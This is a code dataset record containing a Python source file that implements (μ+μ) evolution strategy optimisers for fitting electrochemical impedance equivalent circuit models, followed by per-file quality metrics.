| Column | Dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
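`content` holds the raw source file; the three columns after it (`avg_line_length`, `max_line_length`, `alphanum_fraction`) are simple per-file measurements, and they are consistent with the rows below (Row 1's 29,009-byte `size` divided by its 601 lines gives exactly its `avg_line_length` of 48.267887). A minimal sketch of plausible definitions; the pipeline's exact rules (byte vs. character counts, newline handling) are assumptions here:

```python
def content_stats(content: str) -> dict:
    """Plausible definitions of the three per-file statistics.

    These mirror what the column names suggest; they are assumptions,
    not the dataset's exact implementation.
    """
    lines = content.splitlines()
    return {
        # total size divided by the number of lines (newlines counted in size)
        "avg_line_length": len(content) / max(len(lines), 1),
        "max_line_length": max((len(line) for line in lines), default=0),
        # fraction of all characters that are alphanumeric
        "alphanum_fraction": sum(ch.isalnum() for ch in content) / max(len(content), 1),
    }

print(content_stats("import os\nprint(os.name)\n"))
```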
Row 1

| Field | Value |
|---|---|
| hexsha | 16cbf3091006544445545fa2c6789ddbdf2b95ae |
| size | 29,009 |
| ext | py |
| lang | Python |
| max_stars_repo_path | v0/aia_eis_v0/goa/evolution_based/evolution_strategy/es_0.py |
| max_stars_repo_name | DreamBoatOve/aia_eis |
| max_stars_repo_head_hexsha | 458b4d29846669b10db4da1b3e86c0b394614ceb |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | 1 |
| max_stars_repo_stars_event_min_datetime | 2022-03-02T12:57:19.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-02T12:57:19.000Z |
| max_issues_repo_path | v0/aia_eis_v0/goa/evolution_based/evolution_strategy/es_0.py |
| max_issues_repo_name | DreamBoatOve/aia_eis |
| max_issues_repo_head_hexsha | 458b4d29846669b10db4da1b3e86c0b394614ceb |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | v0/aia_eis_v0/goa/evolution_based/evolution_strategy/es_0.py |
| max_forks_repo_name | DreamBoatOve/aia_eis |
| max_forks_repo_head_hexsha | 458b4d29846669b10db4da1b3e86c0b394614ceb |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |

content:

```python
import copy
import math
import random
from time import perf_counter
import os
import sys
sys.path.append('../../../')
from utils.file_utils.filename_utils import get_ecm_num_str, get_Num_len
from data_processor.GOA_simulation.GOA_ECMs_simulation import load_sim_ecm_para_config_dict
from goa.GOA_criterions import goa_criterion_pack
from GA_pack.fittness_functions.eis_fitness import cal_EIS_WSE_fitness_1
"""
(μ + μ)-ES
μ parents
μ offspring
the next generation is the best μ entities selected from the μ + μ pool (parents and children)
"""
class ES_0:
"""
Refer:
Book:
Computational intelligence An introduction
part 3 EVOLUTIONARY COMPUTATION
ch12 Evolution Strategies
12.1 (1 + 1)-ES
12.2 Generic Evolution Strategy Algorithm
12.3 Strategy Parameters and Self-Adaptation
12.3.1 Strategy Parameter Types
Paper:
Web:
What is an Evolution Strategy
https://morvanzhou.github.io/tutorials/machine-learning/evolutionary-algorithm/3-01-evolution-strategy/
Code
Matlab
Evolution strategies (es) in matlab
http://freesourcecode.net/matlabprojects/64999/evolution-strategies-(es)-in-matlab#.XYQ0UnakFbo
Adjustable parameters:
common:
number of search agents
number of iterations
unique:
Attention:
Version:
0
"""
class Entity:
def __init__(self, limits_list, fitness_function):
self.limits_list = limits_list
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in limits_list]
self.sigma_ceil = 5
self.sigma_list = [random.uniform(0, self.sigma_ceil) for i in range(len(limits_list))]
self.fitness = fitness_function(self.x_list)
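# update() repairs an entity after crossover/mutation: any gene outside its
# bounds and any sigma above the ceiling is resampled uniformly, and the
# fitness is then re-evaluated.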
def update(self):
for index in range(len(self.limits_list)):
if (self.x_list[index] < self.limits_list[index][0]) or (self.x_list[index] > self.limits_list[index][1]):
self.x_list[index] = random.uniform(self.limits_list[index][0], self.limits_list[index][1])
for index in range(len(self.sigma_list)):
if self.sigma_list[index] > self.sigma_ceil:
self.sigma_list[index] = random.uniform(0, self.sigma_ceil)
self.fitness = self.fitness_function(self.x_list)
def __init__(self, iter_num, entity_num, limits_list, fitness_function):
self.iter_num = iter_num
self.entity_num = entity_num
self.limits_list = limits_list
self.fitness_function = fitness_function
# Initialize parent entities
self.entities_list = [self.Entity(limits_list, fitness_function) for i in range(entity_num)]
# Initialize the global best entity (its fitness is minimized as the run progresses)
self.global_best_entity = self.Entity(limits_list, fitness_function)
def evolve(self):
current_best_entity_list = []
global_best_entity_list = []
for iter in range(self.iter_num):
# Select the current/global best entity
current_best_entity = sorted(self.entities_list, key = lambda entity: entity.fitness, reverse=False)[0]
if self.global_best_entity.fitness > current_best_entity.fitness:
# Deep copies keep the history lists independent of later selection (as in ES_1 below)
self.global_best_entity = copy.deepcopy(current_best_entity)
global_best_entity_list.append(copy.deepcopy(self.global_best_entity))
current_best_entity_list.append(copy.deepcopy(current_best_entity))
# Generate children
child_entities_list = []
for index in range(self.entity_num):
# Select two parents randomly
random_parent_indexes = random.sample(range(self.entity_num), 2)
father = self.entities_list[random_parent_indexes[0]]
mother = self.entities_list[random_parent_indexes[1]]
# Multi-point crossover: each gene (and its sigma) is taken from father or mother with equal probability
child_x_list = []
child_sigma_list = []
for x_index in range(len(self.limits_list)):
r = random.random()
if r > 0.5:
# child_x_list.append(father.x_list[x_index])
# child_sigma_list.append(father.sigma_list[x_index])
x = father.x_list[x_index]
sigma = father.sigma_list[x_index]
else:
# child_x_list.append(mother.x_list[x_index])
# child_sigma_list.append(mother.sigma_list[x_index])
x = mother.x_list[x_index]
sigma = mother.sigma_list[x_index]
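# Self-adaptation: perturb the inherited sigma by a uniform offset in
# [-0.5, 0.5] (floored at 0.001), then mutate the gene with Gaussian noise
# of variance sigma (hence the sqrt below).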
sigma = max(sigma + random.uniform(0, 1) - 0.5, 0.001)
x = x + math.sqrt(sigma) * random.gauss(mu=0, sigma=1)
child_x_list.append(x)
child_sigma_list.append(sigma)
child_entity = self.Entity(self.limits_list, self.fitness_function)
child_entity.x_list = child_x_list
child_entity.sigma_list = child_sigma_list
child_entity.update()
child_entities_list.append(child_entity)
# Rank parents + children and keep the best μ entities by fitness
all_entity = self.entities_list + child_entities_list
self.entities_list = sorted(all_entity, key=lambda entity: entity.fitness, reverse=False)[:self.entity_num]
return current_best_entity_list, global_best_entity_list
# if __name__ == '__main__':
# iter_num = 1000
# entity_num = 10
# dim = 4
#
# f1_limits_list = [[-100, 100] for i in range(dim)]
# from GA_pack.fittness_functions.f1 import f1
#
# f1_fitness_function = f1
# es = ES_0(iter_num, entity_num, f1_limits_list, f1_fitness_function)
# current_best_entity_list, global_best_entity_list = es.evolve()
# print('Best entity position:', es.global_best_entity.x_list)
# print('Fitness:', es.global_best_entity.fitness)
#
# # Draw the best entity in each iteration.
# iter_list = [i for i in range(iter_num)]
# cur_fitness_list = [entity.fitness for entity in current_best_entity_list]
# cur_global_fitness_list = [entity.fitness for entity in global_best_entity_list]
#
# import matplotlib.pyplot as plt
# fig, ax = plt.subplots()
# line1, = ax.plot(iter_list, cur_fitness_list, label='Current Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, entity_num, dim))
# line1.set_dashes([2, 2, 10, 2]) # 2pt line, 2pt break, 10pt line, 2pt break
# line2, = ax.plot(iter_list, cur_global_fitness_list, label='Current Global Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, entity_num, dim))
# line2.set_dashes([2, 2, 10, 2]) # 2pt line, 2pt break, 10pt line, 2pt break
# ax.legend()
# plt.xlabel('Iteration times')
# plt.ylabel('Error rate')
# plt.title('Search the minimum of f1 = sum(Xi ^ 2)')
# plt.show()
class ES_1:
"""
Refer:
Book:
Computational intelligence An introduction
part 3 EVOLUTIONARY COMPUTATION
12 Evolution Strategies
12.1 (1 + 1)-ES
12.2 Generic Evolution Strategy Algorithm
12.3 Strategy Parameters and Self-Adaptation
12.3.1 Strategy Parameter Types
Paper:
Web:
What is an Evolution Strategy
https://morvanzhou.github.io/tutorials/machine-learning/evolutionary-algorithm/3-01-evolution-strategy/
Code
Matlab
Evolution strategies (es) in matlab
http://freesourcecode.net/matlabprojects/64999/evolution-strategies-(es)-in-matlab#.XYQ0UnakFbo
Adjustable parameters:
common:
number of search agents
number of iterations
unique:
Attention:
Version:
0
"""
class Entity:
def __init__(self, limits_list, sigma_limit_list, fitness_function):
self.limits_list = limits_list
self.sigma_limit_list = sigma_limit_list
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in limits_list]
self.sigma_list = [random.uniform(0.0, s_limit) for s_limit in self.sigma_limit_list]
self.fitness = fitness_function(self.x_list)
def update(self):
for index in range(len(self.limits_list)):
if (self.x_list[index] < self.limits_list[index][0]) or (self.x_list[index] > self.limits_list[index][1]):
self.x_list[index] = random.uniform(self.limits_list[index][0], self.limits_list[index][1])
for index in range(len(self.sigma_list)):
if self.sigma_list[index] > self.sigma_limit_list[index]:
self.sigma_list[index] = random.uniform(0, self.sigma_limit_list[index])
self.fitness = self.fitness_function(self.x_list)
def __init__(self, iter_num, entity_num, limits_list, fitness_function):
self.iter_num = iter_num
self.entity_num = entity_num
self.limits_list = limits_list
# The per-dimension sigma ceiling scales with the width of that dimension's
# search range, keeping mutation steps consistent with each dimension's limits
self.sigma_limit_list = [(limit[1] - limit[0]) / 3 for limit in self.limits_list]
self.fitness_function = fitness_function
# Initialize parent entities
self.entities_list = [self.Entity(limits_list, self.sigma_limit_list, fitness_function) for i in range(entity_num)]
# Initialize the global best entity (its fitness is minimized as the run progresses)
self.global_best_entity = self.Entity(limits_list, self.sigma_limit_list, fitness_function)
def evolve(self):
current_best_entity_list = []
global_best_entity_list = []
for iter in range(self.iter_num):
self.entities_list.sort(key=lambda en:en.fitness, reverse=False)
# Select the current/global best entity
current_best_entity = self.entities_list[0]
if current_best_entity.fitness < self.global_best_entity.fitness:
self.global_best_entity = copy.deepcopy(current_best_entity)
global_best_entity_list.append(copy.deepcopy(self.global_best_entity))
current_best_entity_list.append(copy.deepcopy(current_best_entity))
# Generate children
child_entities_list = []
for index in range(self.entity_num):
# Select two parents randomly
random_parent_indexes = random.sample(range(self.entity_num), 2)
father = self.entities_list[random_parent_indexes[0]]
mother = self.entities_list[random_parent_indexes[1]]
# Multi-point crossover: each gene (and its sigma) is taken from father or mother with equal probability
child_x_list = []
child_sigma_list = []
for x_index in range(len(self.limits_list)):
r = random.random()
if r > 0.5:
# child_x_list.append(father.x_list[x_index])
# child_sigma_list.append(father.sigma_list[x_index])
x = father.x_list[x_index]
sigma = father.sigma_list[x_index]
else:
# child_x_list.append(mother.x_list[x_index])
# child_sigma_list.append(mother.sigma_list[x_index])
x = mother.x_list[x_index]
sigma = mother.sigma_list[x_index]
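# Same self-adaptation as ES_0, but the floor is 1% of the per-dimension
# sigma limit and sigma is used directly as the standard deviation of the
# Gaussian step (ES_0 treated it as a variance).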
sigma = max(sigma + random.uniform(0, 1) - 0.5, self.sigma_limit_list[x_index] * 0.01)
x = x + random.gauss(mu=0, sigma=sigma)
child_x_list.append(x)
child_sigma_list.append(sigma)
child_entity = self.Entity(self.limits_list, self.sigma_limit_list, self.fitness_function)
child_entity.x_list = child_x_list
child_entity.sigma_list = child_sigma_list
child_entity.update()
child_entities_list.append(child_entity)
# Rank parents + children and keep the best μ entities by fitness
all_entity = self.entities_list + child_entities_list
self.entities_list = sorted(all_entity, key=lambda entity: entity.fitness, reverse=False)[:self.entity_num]
return current_best_entity_list, global_best_entity_list
# if __name__ == '__main__':
# iter_num = 1000
# entity_num = 10
# dim = 4
#
# f1_limits_list = [[-100, 100] for i in range(dim)]
# from GA_pack.fittness_functions.f1 import f1
#
# f1_fitness_function = f1
# es = ES_1(iter_num, entity_num, f1_limits_list, f1_fitness_function)
# current_best_entity_list, global_best_entity_list = es.evolve()
# print('Best entity position:', es.global_best_entity.x_list)
# print('Fitness:', es.global_best_entity.fitness)
#
# # Draw the best entity in each iteration.
# iter_list = [i for i in range(iter_num)]
# cur_fitness_list = [entity.fitness for entity in current_best_entity_list]
# cur_global_fitness_list = [entity.fitness for entity in global_best_entity_list]
#
# import matplotlib.pyplot as plt
# fig, ax = plt.subplots()
# line1, = ax.plot(iter_list, cur_fitness_list, label='Current Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, entity_num, dim))
# line1.set_dashes([2, 2, 10, 2]) # 2pt line, 2pt break, 10pt line, 2pt break
# line2, = ax.plot(iter_list, cur_global_fitness_list, label='Current Global Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, entity_num, dim))
# line2.set_dashes([2, 2, 10, 2]) # 2pt line, 2pt break, 10pt line, 2pt break
# ax.legend()
# plt.xlabel('Iteration times')
# plt.ylabel('Error rate')
# plt.title('Search the minimum of f1 = sum(Xi ^ 2)')
# plt.show()
class ES_EIS:
"""
Refer:
Book:
Computational intelligence An introduction
part 3 EVOLUTIONARY COMPUTATION
12 Evolution Strategies
12.1 (1 + 1)-ES
12.2 Generic Evolution Strategy Algorithm
12.3 Strategy Parameters and Self-Adaptation
12.3.1 Strategy Parameter Types
Paper:
Web:
What is an Evolution Strategy
https://morvanzhou.github.io/tutorials/machine-learning/evolutionary-algorithm/3-01-evolution-strategy/
Code
Matlab
Evolution strategies (es) in matlab
http://freesourcecode.net/matlabprojects/64999/evolution-strategies-(es)-in-matlab#.XYQ0UnakFbo
Adjustable parameters:
common:
number of search agents
number of iterations
unique:
Attention:
Version:
0
"""
class Entity:
def __init__(self, exp_data_dict, sigma_limit_list, fitness_function):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.sigma_limit_list = sigma_limit_list
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in self.limits_list]
self.sigma_list = [random.uniform(0.0, s_limit) for s_limit in self.sigma_limit_list]
self.fitness = fitness_function(self.exp_data_dict, self.x_list)
def update(self):
for index in range(len(self.limits_list)):
if (self.x_list[index] < self.limits_list[index][0]) or (self.x_list[index] > self.limits_list[index][1]):
self.x_list[index] = random.uniform(self.limits_list[index][0], self.limits_list[index][1])
for index in range(len(self.sigma_list)):
if self.sigma_list[index] > self.sigma_limit_list[index]:
self.sigma_list[index] = random.uniform(0, self.sigma_limit_list[index])
self.fitness = self.fitness_function(self.exp_data_dict, self.x_list)
def __init__(self, exp_data_dict, iter_num, entity_num, fitness_function=cal_EIS_WSE_fitness_1):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.iter_num = iter_num
self.entity_num = entity_num
# The per-dimension sigma ceiling scales with the width of that dimension's
# search range, keeping mutation steps consistent with each dimension's limits
self.sigma_limit_list = [(limit[1] - limit[0]) / 3 for limit in self.limits_list]
self.fitness_function = fitness_function
# Initialize parent entities
self.entities_list = [self.Entity(self.exp_data_dict, self.sigma_limit_list, fitness_function) for i in range(entity_num)]
# Initialize the global best entity (its fitness is minimized as the run progresses)
self.global_best_entity = self.Entity(self.exp_data_dict, self.sigma_limit_list, fitness_function)
def search(self):
current_best_entity_list = []
global_best_entity_list = []
continue_criterion = True
iter = 0
while continue_criterion:
self.entities_list.sort(key=lambda en:en.fitness, reverse=False)
# Select the current/global best entity
current_best_entity = self.entities_list[0]
if current_best_entity.fitness < self.global_best_entity.fitness:
self.global_best_entity = copy.deepcopy(current_best_entity)
global_best_entity_list.append(copy.deepcopy(self.global_best_entity))
current_best_entity_list.append(copy.deepcopy(current_best_entity))
# Generate children
child_entities_list = []
for index in range(self.entity_num):
# Select two parents randomly
random_parent_indexes = random.sample(range(self.entity_num), 2)
father = self.entities_list[random_parent_indexes[0]]
mother = self.entities_list[random_parent_indexes[1]]
# Multi-point crossover: each gene (and its sigma) is taken from father or mother with equal probability
child_x_list = []
child_sigma_list = []
for x_index in range(len(self.limits_list)):
r = random.random()
if r > 0.5:
# child_x_list.append(father.x_list[x_index])
# child_sigma_list.append(father.sigma_list[x_index])
x = father.x_list[x_index]
sigma = father.sigma_list[x_index]
else:
# child_x_list.append(mother.x_list[x_index])
# child_sigma_list.append(mother.sigma_list[x_index])
x = mother.x_list[x_index]
sigma = mother.sigma_list[x_index]
sigma = max(sigma + random.uniform(0, 1) - 0.5, self.sigma_limit_list[x_index] * 0.01)
x = x + random.gauss(mu=0, sigma=sigma)
child_x_list.append(x)
child_sigma_list.append(sigma)
child_entity = self.Entity(self.exp_data_dict, self.sigma_limit_list, self.fitness_function)
child_entity.x_list = child_x_list
child_entity.sigma_list = child_sigma_list
child_entity.update()
child_entities_list.append(child_entity)
# Rank parents + children and keep the best μ entities by fitness
all_entity = self.entities_list + child_entities_list
self.entities_list = sorted(all_entity, key=lambda entity: entity.fitness, reverse=False)[:self.entity_num]
# The stop criterion compares the two most recent global bests, so it can
# only be evaluated from the second iteration onward (global_best_entity_list
# gains one entry per iteration; current_best_entity_list would serve equally well)
if iter >= 1:
x_lists_list = [global_best_entity_list[-2].x_list, global_best_entity_list[-1].x_list]
goa_criterion, chi_squared = goa_criterion_pack(x_lists_list=x_lists_list, iter=iter,
max_iter_time=self.iter_num,
data_dict=self.exp_data_dict)
if goa_criterion:
continue_criterion = False
iter += 1
return current_best_entity_list, global_best_entity_list, iter, chi_squared
class ES_EIS_access:
"""
Refer:
Book:
Computational intelligence An introduction
part 3 EVOLUTIONARY COMPUTATION
12 Evolution Strategies
12.1 (1 + 1)-ES
12.2 Generic Evolution Strategy Algorithm
12.3 Strategy Parameters and Self-Adaptation
12.3.1 Strategy Parameter Types
Paper:
Web:
What is an Evolution Strategy
https://morvanzhou.github.io/tutorials/machine-learning/evolutionary-algorithm/3-01-evolution-strategy/
Code
Matlab
Evolution strategies (es) in matlab
http://freesourcecode.net/matlabprojects/64999/evolution-strategies-(es)-in-matlab#.XYQ0UnakFbo
Adjustable parameters:
common:
number of search agents
number of iterations
unique:
Attention:
Version:
0
"""
class Entity:
def __init__(self, exp_data_dict, sigma_limit_list, fitness_function):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.sigma_limit_list = sigma_limit_list
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in self.limits_list]
self.sigma_list = [random.uniform(0.0, s_limit) for s_limit in self.sigma_limit_list]
self.fitness = fitness_function(self.exp_data_dict, self.x_list)
def update(self):
for index in range(len(self.limits_list)):
if (self.x_list[index] < self.limits_list[index][0]) or (self.x_list[index] > self.limits_list[index][1]):
self.x_list[index] = random.uniform(self.limits_list[index][0], self.limits_list[index][1])
for index in range(len(self.sigma_list)):
if self.sigma_list[index] > self.sigma_limit_list[index]:
self.sigma_list[index] = random.uniform(0, self.sigma_limit_list[index])
self.fitness = self.fitness_function(self.exp_data_dict, self.x_list)
def __init__(self, exp_data_dict, iter_num, entity_num, fitness_function=cal_EIS_WSE_fitness_1):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.iter_num = iter_num
self.entity_num = entity_num
# The per-dimension sigma ceiling scales with the width of that dimension's
# search range, keeping mutation steps consistent with each dimension's limits
self.sigma_limit_list = [(limit[1] - limit[0]) / 3 for limit in self.limits_list]
self.fitness_function = fitness_function
# Initialize parent entities
self.entities_list = [self.Entity(self.exp_data_dict, self.sigma_limit_list, fitness_function) for i in range(entity_num)]
# Initialize the global best entity (its fitness is minimized as the run progresses)
self.global_best_entity = self.Entity(self.exp_data_dict, self.sigma_limit_list, fitness_function)
def search(self, res_fn, start_time):
current_best_entity_list = []
global_best_entity_list = []
continue_criterion = True
iter = 0
while continue_criterion:
self.entities_list.sort(key=lambda en:en.fitness, reverse=False)
# Select the current/global best entity
current_best_entity = self.entities_list[0]
if current_best_entity.fitness < self.global_best_entity.fitness:
self.global_best_entity = copy.deepcopy(current_best_entity)
global_best_entity_list.append(copy.deepcopy(self.global_best_entity))
current_best_entity_list.append(copy.deepcopy(current_best_entity))
# Generate children
child_entities_list = []
for index in range(self.entity_num):
# Select two parents randomly
random_parent_indexes = random.sample(range(self.entity_num), 2)
father = self.entities_list[random_parent_indexes[0]]
mother = self.entities_list[random_parent_indexes[1]]
# Multi-point crossover: each gene (and its sigma) is taken from father or mother with equal probability
child_x_list = []
child_sigma_list = []
for x_index in range(len(self.limits_list)):
r = random.random()
if r > 0.5:
# child_x_list.append(father.x_list[x_index])
# child_sigma_list.append(father.sigma_list[x_index])
x = father.x_list[x_index]
sigma = father.sigma_list[x_index]
else:
# child_x_list.append(mother.x_list[x_index])
# child_sigma_list.append(mother.sigma_list[x_index])
x = mother.x_list[x_index]
sigma = mother.sigma_list[x_index]
sigma = max(sigma + random.uniform(0, 1) - 0.5, self.sigma_limit_list[x_index] * 0.01)
x = x + random.gauss(mu=0, sigma=sigma)
child_x_list.append(x)
child_sigma_list.append(sigma)
child_entity = self.Entity(self.exp_data_dict, self.sigma_limit_list, self.fitness_function)
child_entity.x_list = child_x_list
child_entity.sigma_list = child_sigma_list
child_entity.update()
child_entities_list.append(child_entity)
# Rank parents + children and keep the best μ entities by fitness
all_entity = self.entities_list + child_entities_list
self.entities_list = sorted(all_entity, key=lambda entity: entity.fitness, reverse=False)[:self.entity_num]
# The stop criterion compares the two most recent global bests, so it can
# only be evaluated from the second iteration onward (global_best_entity_list
# gains one entry per iteration; current_best_entity_list would serve equally well)
if iter >= 1:
x_lists_list = [global_best_entity_list[-2].x_list, global_best_entity_list[-1].x_list]
goa_criterion, chi_squared = goa_criterion_pack(x_lists_list=x_lists_list, \
iter=iter, \
max_iter_time=self.iter_num, \
data_dict=self.exp_data_dict, \
CS_limit=1e-70)
# Append one line per iteration to the result file (R(RC)_IS_lin-kk_res.txt
# format): iteration index, fitted parameter list, chi-squared, running time
with open(res_fn, 'a+') as file:
line = str(iter) + ',[' \
+ ','.join([str(para) for para in global_best_entity_list[-1].x_list]) + '],' \
+ str(chi_squared) + ',' + str(perf_counter() - start_time) + '\n'
file.write(line)
if goa_criterion:
continue_criterion = False
iter += 1
def access_ES_EIS():
counter = 0
# Iterate on 9 ECMs
for i in range(1, 10):
ecm_sim_folder = '../../../datasets/goa_datasets/simulated'
ecm_num = i
ecm_num_str = get_ecm_num_str(ecm_num)
file_path = os.path.join(ecm_sim_folder, 'ecm_' + ecm_num_str)
sim_ecm = load_sim_ecm_para_config_dict(ecm_num, file_path)
para_num = len(sim_ecm['para'])
# Iterate for 100 times
for j in range(100):
t_start = perf_counter()
# ------------------------------ Change GOA name ------------------------------
goa = ES_EIS_access(exp_data_dict=sim_ecm, iter_num=10000, entity_num=10*para_num)
res_fn = 'es_ecm{0}_'.format(i) + get_Num_len(num=j, length=2) + '.txt'
# ------------------------------ Change GOA name ------------------------------
goa.search(res_fn, start_time=t_start)
counter += 1
print('ES left: {0}'.format(900 - counter))
access_ES_EIS()
```
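All four classes in this file share the same survivor selection: parents and children are merged, then truncated to the best `entity_num` by fitness. A self-contained sketch of that (μ + μ) step on a toy sphere function; the helper names here are illustrative, not from the file above:

```python
import random

def sphere(x):
    # Toy objective: smaller is better.
    return sum(v * v for v in x)

def mu_plus_mu_step(parents, mutate, fitness):
    """One (mu + mu) generation: each parent spawns one child, then the
    best mu of the merged pool survive (truncation selection)."""
    children = [mutate(p) for p in parents]
    pool = parents + children
    return sorted(pool, key=fitness)[:len(parents)]

random.seed(0)
population = [[random.uniform(-100, 100) for _ in range(4)] for _ in range(10)]
for _ in range(300):
    population = mu_plus_mu_step(
        population,
        mutate=lambda p: [v + random.gauss(0, 1) for v in p],
        fitness=sphere,
    )
print(min(sphere(p) for p in population))  # steadily decreases toward 0
```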
Quality signals:

| Field | Value |
|---|---|
| avg_line_length | 48.267887 |
| max_line_length | 164 |
| alphanum_fraction | 0.607398 |
| qsc_code_num_words_quality_signal | 3,633 |
| qsc_code_num_chars_quality_signal | 29,009 |
| qsc_code_mean_word_length_quality_signal | 4.566749 |
| qsc_code_frac_words_unique_quality_signal | 0.075145 |
| qsc_code_frac_chars_top_2grams_quality_signal | 0.052438 |
| qsc_code_frac_chars_top_3grams_quality_signal | 0.048219 |
| qsc_code_frac_chars_top_4grams_quality_signal | 0.029293 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | 0.934181 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | 0.928636 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | 0.922488 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | 0.916581 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | 0.906395 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | 0.891809 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | 0 |
